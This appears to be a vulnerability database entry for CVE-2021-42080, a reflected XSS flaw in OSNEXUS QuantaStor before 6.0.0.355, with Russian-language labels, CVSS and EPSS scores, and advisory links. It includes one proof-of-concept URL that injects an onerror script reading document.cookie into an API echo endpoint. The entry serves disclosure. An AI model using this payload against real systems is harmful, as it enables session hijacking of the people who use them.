exploitDog

CVE-2021-42080

Опубликовано: 10 июл. 2023

Источник: nvd

CVSS3: 7.4

EPSS Низкий

Описание

An attacker is able to launch a Reflected XSS attack using a crafted URL.

POC:

Visit the following URL https://:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>

Ссылки

https://csirt.divd.nl/CVE-2021-42080
Third Party Advisory
https://csirt.divd.nl/DIVD-2021-00020/
https://www.osnexus.com/products/software-defined-storage
Product
https://www.wbsec.nl/osnexus
Third Party Advisory
https://csirt.divd.nl/CVE-2021-42080
Third Party Advisory
https://www.divd.nl/DIVD-2021-00020
https://www.osnexus.com/products/software-defined-storage
Product
https://www.wbsec.nl/osnexus
Third Party Advisory

Уязвимые конфигурации

Конфигурация 1

cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*

Версия до 6.0.0.355 (исключая)

EPSS

Процентиль: 35%

0.00142

Низкий

7.4 High

CVSS3

Дефекты

CWE-79

CWE-79

Связанные уязвимости

GHSA-wf5c-q6vq-584r

CVSS3: 6.5

github

больше 2 лет назад

An attacker is able to launch a Reflected XSS attack using a crafted URL.

EPSS

Процентиль: 35%

0.00142

Низкий

7.4 High

CVSS3

Дефекты

CWE-79

CWE-79